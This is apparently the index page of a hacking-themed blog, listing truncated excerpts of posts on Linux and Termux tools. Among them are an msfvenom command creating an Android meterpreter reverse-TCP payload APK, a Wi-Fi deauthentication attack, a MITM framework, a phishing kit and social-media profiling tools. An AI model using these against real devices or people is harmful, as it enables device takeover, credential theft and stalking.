root@cyberlab:~# Initializing Cybersecurity Blog...

LINUX SYSTEM MONITORING AND ANIMATION COMMANDS

Fun and Entertainment Tools #cmatrix Installation: Debian/Ubuntu:   sudo apt install cmatrix Fedora:   sudo dnf install cmatrix Arch:   sudo...

SSH SERVER INTERFACE

 For Android   pkg install openssh pkg install nmap sshd nmap localhost  whoami ifconfig ssh@<username><ip> -p <port number...

ANDROID PAYLOAD USING METASPLOIT

COMMAND TO CREATE PAYLOAD  msfveom -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT= (port) R> app.apk   COMMAND FOR PAYLOAD HANDLER u...

SSH SERVER INTERFACE SHARING

  INSTALLING TERMINAL Android = termux (install from play store)  Windows = command  prompt (shift + right mouse button ) Linux = terminal (...

WIFI HACKING USING NODEMCU

    Deauth attack A Wi-Fi deauthentication attack is a type of denial-of-service attack that targets communication between a user and a Wi-F...

Enable Extra Keys in Termux

 Enable All Arrow Keys in Termux: mkdir $HOME/.termux/ ;echo "extra-keys = [['ESC','/','-','HOME','...

MITM Framework

Installation git clone https://github.com/The404Hacking/websploit.git  cd websploit python2 websploit.py Select module : wsf > use netwo...

SHERLOCK HUNTING SOCIAL MEDIA

Installation  $ git clone https://github.com/sherlock-project/sherlock.git $ cd sherlock $ python3 -m pip install -r requirements.txt Usi...

SOCIALFISH PHISHING

• INSTALLATION PROCESS  git clone https://github.com/xHak9x/SocialPhish.git cd SocialPhish chmod +x socialphish.sh ./socialphish.sh AFTER IN...

INFORMATION GATHERING TOOL

    • INSTALLATION PROCESS  https://github.com/issamelferkh/userrecon.git ./userrecon.sh  

INSTAGRAM INFORMATION GATHERING

• INSTALLATION PROCESS  $ pkg install -y git $ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig $ python3 -m pip insta...

Vulnerability Scanner

INSTALLATION PROCESS RUNING SINGLE COMMAND  wget -O rapidscan.py https://raw.githubusercontent.com/skavngr/rapidscan/master/rapidscan.py ...